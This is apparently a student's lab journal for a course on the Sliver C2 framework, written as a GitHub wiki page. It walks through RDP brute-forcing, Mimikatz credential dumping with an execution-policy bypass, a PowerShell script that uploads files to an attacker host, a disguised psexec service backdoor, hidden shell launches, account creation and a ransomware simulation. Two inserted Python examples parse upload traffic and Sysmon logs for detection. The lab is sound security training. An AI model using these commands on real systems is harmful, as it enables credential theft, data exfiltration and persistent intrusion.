SEC 440 C2 Sliver Part 2 - JadenGil/Jaden-Tech-Journal GitHub Wiki

Installing and configuring Sysmon:

Using this page: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon I downloaded Sysmon onto the Windows machine (wks1), extracted the archive, and moved the contents to the Tools directory.

Before installing, I downloaded the Sysmon config from this GitHub repository: https://github.com/SwiftOnSecurity/sysmon-config and added sysmonconfig-export.xml to the Tools directory.

With the files in the Tools directory, open CMD as administrator, cd into C:\Tools, and enter the following command:

image

If you now look in Windows Event Viewer, you will see that Sysmon is operational.

Deliverable 1:

image


Lateral Movement:

To start this section, we create two files, users.txt and passwords.txt, holding the usernames and passwords for the users on the domain.

image

Next we install crowbar. Typing crowbar in the terminal installs it if it is not already installed:

image

On the Windows machine, Remote Desktop must be enabled. This is simple to do: type "Remote desktop settings" into the search bar and you'll see a button to enable it.

Now, on the Kali machine, run the following command with the files that were made before.

Deliverable 2:

image

Using hydra, you can achieve a similar result.

Deliverable 3:

image

Using xfreerdp, we can RDP into the Windows machine with that information (admin or not).

Deliverable 4:

image

On the Kali machine, start sliver-server and sliver-client, start the mTLS listener on the server, then back on the Windows machine run the implant from last time as administrator.

image

Now that the implant has connected back to the Kali machine, go back into Sliver and run the commands execute -o hostname and execute -o Net localgroup administrators.

image

Then we can run the command execute -o powershell Get-MpComputerStatus.

Deliverable 5:

image

Next we need to download the Sysinternals Suite to the Kali box from here: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

Once downloaded, make sure the tools are copied into /var/www/html/files/. Then we can upload them to the Windows machine with Sliver:

image

Deliverable 6:

image

Now we will simulate a Mimikatz run.

We start on the Kali box with the command git clone https://github.com/g4uss47/Invoke-Mimikatz

The output should look like this:

image

Back in the terminal running sliver-client, use the shell command. The output should look like this:

image


Method 2:

If you don’t want Mimikatz to touch the disk of your target, you can use these commands:

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Note: to get this to work I first had to run Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process; it wouldn't work until I did this.

The output should look like this (Deliverable 7):

image


Execution, Exfiltration, and Impact

Deliverable 8:

This screenshot shows that I ran the command systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> C:\Users\Public\Documents\info2.txt over RDP from my Kali terminal, and a file was created showing the Windows OS version that the victim box was running:

image

This screenshot shows the same idea with ipconfig /all, using the command ipconfig /all >> C:\Users\Public\Documents\info.txt

image

This final screenshot shows a similar idea using the command wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" >> C:\Users\Public\Documents\info3.txt

image


Exfiltration

To start this section, I made a file named upload.ps1 with the following content. Credit goes to alexlehm on GitHub: https://gist.githubusercontent.com/alexlehm/bae63d78bd59c46f4170d27766d2db85/raw/b729ec867d7977295dfd7f98369becd5ca3de9ed/deploy.ps1

# upload file with form-data to a URL using powershell
# this works with binary files, no conversion happens to the file
#
# this can be used to deploy files on AppVeyor

$File='result.zip';
$FilePath = Get-Item -Path $File;
$URL = "192.168.1.10/upload.php";

$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
$fileEnc = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString(); 
$EOL = "`r`n";

$bodyLines = ( 
    "--$boundary",
    "Content-Disposition: form-data; name=`"file`"; filename=`"$File`"",
    "Content-Type: application/octet-stream",
    "",
    $fileEnc,
    "--$boundary",
    "Content-Disposition: form-data; name=`"filename`"",
    "",
    $File,
    "--$boundary",
    "Content-Disposition: form-data; name=`"apikey`"",
    "",
    "abcd",
    "--$boundary--",
    "" 
) -join $EOL

Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines
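It is worth seeing exactly what upload.ps1 puts on the wire, because that body is what a web proxy or network sensor has to parse to notice a file leaving the host. The Python below is an added example, not part of this journal or of alexlehm's gist: it rebuilds a body with the same three parts and boundary layout as the script, parses it with the standard library's email parser the way an inspection point would, and returns the parts so a monitoring rule can flag file uploads. The boundary, file name, payload bytes and API key value are constructed for the example.

```python
from email.parser import BytesParser
from email.policy import default as default_policy

# Constructed sample values for the example (not taken from the journal)
BOUNDARY = "5f0c6c1e-example-boundary"
FILENAME = "result.zip"
PAYLOAD = b"PK\x03\x04\x00\xff\xfe" + b"not a real archive"  # binary-looking bytes
APIKEY = "abcd"
EOL = b"\r\n"


def build_form_body(boundary, filename, payload, apikey):
    """Lay the body out exactly as upload.ps1 does: file part, filename part, apikey part."""
    b = boundary.encode()
    lines = [
        b"--" + b,
        b'Content-Disposition: form-data; name="file"; filename="' + filename.encode() + b'"',
        b"Content-Type: application/octet-stream",
        b"",
        payload,                      # raw bytes, no transfer encoding
        b"--" + b,
        b'Content-Disposition: form-data; name="filename"',
        b"",
        filename.encode(),
        b"--" + b,
        b'Content-Disposition: form-data; name="apikey"',
        b"",
        apikey.encode(),
        b"--" + b + b"--",
        b"",
    ]
    return EOL.join(lines)


def parse_form_body(content_type, body):
    """Parse a multipart/form-data body the way an inspecting proxy would.

    The email package handles any multipart/* type; we prepend the request's
    Content-Type header so the parser knows the boundary.
    """
    raw = b"Content-Type: " + content_type.encode() + EOL + EOL + body
    msg = BytesParser(policy=default_policy).parsebytes(raw)
    parts = []
    for part in msg.iter_parts():
        disp = part["Content-Disposition"]
        parts.append({
            "name": disp.params.get("name") if disp else None,
            "filename": part.get_filename(),          # only set on the file part
            "content_type": part.get_content_type(),  # text/plain when absent
            "payload": part.get_payload(decode=True),  # bytes, as sent
        })
    return parts


def file_uploads(parts):
    """Return (filename, size) for every part that carries a file; empty means no upload."""
    return [(p["filename"], len(p["payload"])) for p in parts if p["filename"]]


if __name__ == "__main__":
    body = build_form_body(BOUNDARY, FILENAME, PAYLOAD, APIKEY)
    parts = parse_form_body(f'multipart/form-data; boundary="{BOUNDARY}"', body)
    for p in parts:
        print(p["name"], p["content_type"], p["filename"], len(p["payload"]))
    print("uploads:", file_uploads(parts))
```

The file part is the only one with a filename attribute and an application/octet-stream type, which is the simplest thing for a proxy rule to key on; the apikey field travels in clear text inside the same body, so anyone who can read the request can also read it.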

I then started a PHP server with the command php -S 0.0.0.0:80.

image

And on sliver-client I uploaded upload.ps1 to the Windows machine:

image

Windows box with up.ps1:

image

We can also verify this by opening the shell in Sliver again, navigating to C:\Users\Public\Documents, and running dir to see that up.ps1 is present.

Deliverable 9:

image


Impact

Now I will deploy a Windows service as a backdoor. This is done by first generating a service-format implant profile and then deploying it onto the victim's system:

profiles new --format service --skip-symbols --mtls 192.168.1.13 win-service

psexec -b C:\\Windows\\System32 -d 'Disk Scheduling Service' -s DskSch.exe -p win-service 192.168.1.13

Deliverable 10:

image
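The Sysmon install at the top of this page is what makes the later steps visible to a defender: the Net localgroup administrators enumeration, the Invoke-Mimikatz run (both its command line and its read of lsass memory), and the DskSch.exe service that psexec plants all leave Sysmon records. The Python below is an added example, not part of this journal, of Sliver, or of Sysmon: it parses Sysmon records in exported Event XML form (EventID under System, then EventData/Data Name="..." fields, as Event Viewer shows them) and flags those four behaviours. The sample records, the KNOWN_SERVICE_IMAGES baseline and the rule names are assumptions made for the example; only the field names follow the Sysmon schema. The lsass rule relies on the Sysmon config logging ProcessAccess events for lsass.exe, which the SwiftOnSecurity config installed above does.

```python
import xml.etree.ElementTree as ET

# Namespace used by exported Windows event XML
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample log for the example: four Event 1 (ProcessCreate) records and
# one Event 10 (ProcessAccess) record. Paths and command lines are invented.
SAMPLE_EVENTS = r"""<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\Windows\System32\notepad.exe</Data>
<Data Name="CommandLine">notepad.exe</Data>
<Data Name="ParentImage">C:\Windows\explorer.exe</Data>
</EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\Windows\System32\net.exe</Data>
<Data Name="CommandLine">net localgroup administrators</Data>
<Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
</EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="CommandLine">powershell.exe -Command Invoke-Mimikatz -Command sekurlsa::logonpasswords</Data>
<Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
</EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\Windows\System32\DskSch.exe</Data>
<Data Name="CommandLine">C:\Windows\System32\DskSch.exe</Data>
<Data Name="ParentImage">C:\Windows\System32\services.exe</Data>
</EventData></Event>
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1010</Data>
</EventData></Event>
</Events>"""

# Placeholder baseline of binaries services.exe normally starts; a real deployment
# would build this from the host's own service inventory.
KNOWN_SERVICE_IMAGES = {"svchost.exe", "spoolsv.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory


def image_name(path):
    """Lower-cased basename of a Windows path (os.path would not split on '\\' off-Windows)."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(xml_text):
    """Return a list of (event_id, {field: value}) from exported Sysmon event XML."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.findall("e:Event", NS):
        event_id = int(ev.find("e:System/e:EventID", NS).text)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append((event_id, data))
    return events


def triage(events):
    """Apply the four rules and return (rule_name, detail) tuples in event order."""
    findings = []
    for event_id, d in events:
        if event_id == 1:
            image = image_name(d.get("Image", ""))
            parent = image_name(d.get("ParentImage", ""))
            cmd = d.get("CommandLine", "").lower()
            if image in {"net.exe", "net1.exe"} and "localgroup" in cmd and "administrators" in cmd:
                findings.append(("admin-group-enumeration", d["CommandLine"]))
            if "invoke-mimikatz" in cmd or "sekurlsa::" in cmd:
                findings.append(("mimikatz-commandline", d["CommandLine"]))
            if parent == "services.exe" and image not in KNOWN_SERVICE_IMAGES:
                findings.append(("unbaselined-service-binary", d["Image"]))
        elif event_id == 10:
            target = image_name(d.get("TargetImage", ""))
            access = int(d.get("GrantedAccess", "0x0"), 16)
            if target == "lsass.exe" and access & PROCESS_VM_READ:
                findings.append(("lsass-memory-read", f"{d['SourceImage']} ({d['GrantedAccess']})"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:28} {detail}")
```

To run it against a real host, export the log with wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml and wrap the resulting Event elements in an Events root element carrying the namespace above, since wevtutil emits them as a bare sequence. The service rule is the noisy one: without a per-host baseline it fires on every legitimate service start, which is exactly why the lab's DskSch.exe with an innocuous description blends in until someone compares against an inventory.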


Ransomware Simulation

To get started on this section I first need to download the following files:

LoadObfuscatedScript.ps1

RansomwareSim.ps1

create-vsc.ps1

Downloaded from here:

https://github.com/ashemery/scripts

File Passwords:

LoadScripts File = WORKSHOP2024

Ransomware File = D0ntD0Th1s@Hom3

Before starting the simulation, we need to run create-vsc.ps1 one or more times to generate a Volume Shadow Copy of the C: volume. (This must be done in an administrator PowerShell session.)

Powershell.exe -noexit -ExecutionPolicy Bypass -File .\LoadObfuscatedScript.ps1 .\create-vsc.ps1 WORKSHOP2024

This is what it'll look like when run:

image

Deliverable 11:

image

Now, in Sliver, we run the command .\LoadObfuscatedScript.ps1 RansomwareSim.ps1 WORKSHOP2024

The output should look like this:

image

Deliverable 12:

Encryption:

image

Decryption:

image


Reflection

This lab was long and tough. While I was working on this lab there were never any big issues that occurred during the process, but rather a lot of little issues that kept preventing progress. The thing that got me the most was the syntax. The software being used was very particular about how it wanted things to be entered, and on occasion this brought me to a halt, because there were times when something wouldn't work well while using Sliver but would work without an issue in regular PowerShell.

On the part where we had to enter these commands:

execute -o Powershell.exe -nop -wind hidden -Exec Bypass "C:\Windows\SysWOW64\cmd.exe"

execute -o net user /add user2 'Passw0rd!'

execute -o net user /add user1 'Passw0rd!'

They just wouldn't work, whether I used them in Sliver or PowerShell, and I ended up having to find a new way to run those same commands, which led me to these:

Start-Process -WindowStyle Hidden -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\SysWOW64\cmd.exe"
Start-Process -FilePath "cmd.exe" -ArgumentList "/c net user user2 'Passw0rd!' /add"
Start-Process -FilePath "cmd.exe" -ArgumentList "/c net user user1 'Passw0rd!' /add"

These modified commands worked in exactly the same way but were able to play nice with the command lines, though I am still unsure what was causing this issue other than the fact that PowerShell doesn't recognize the term "execute".

Those were the only big issues I found myself dealing with during this lab and overall I am feeling a lot more confident with Sliver and Powershell.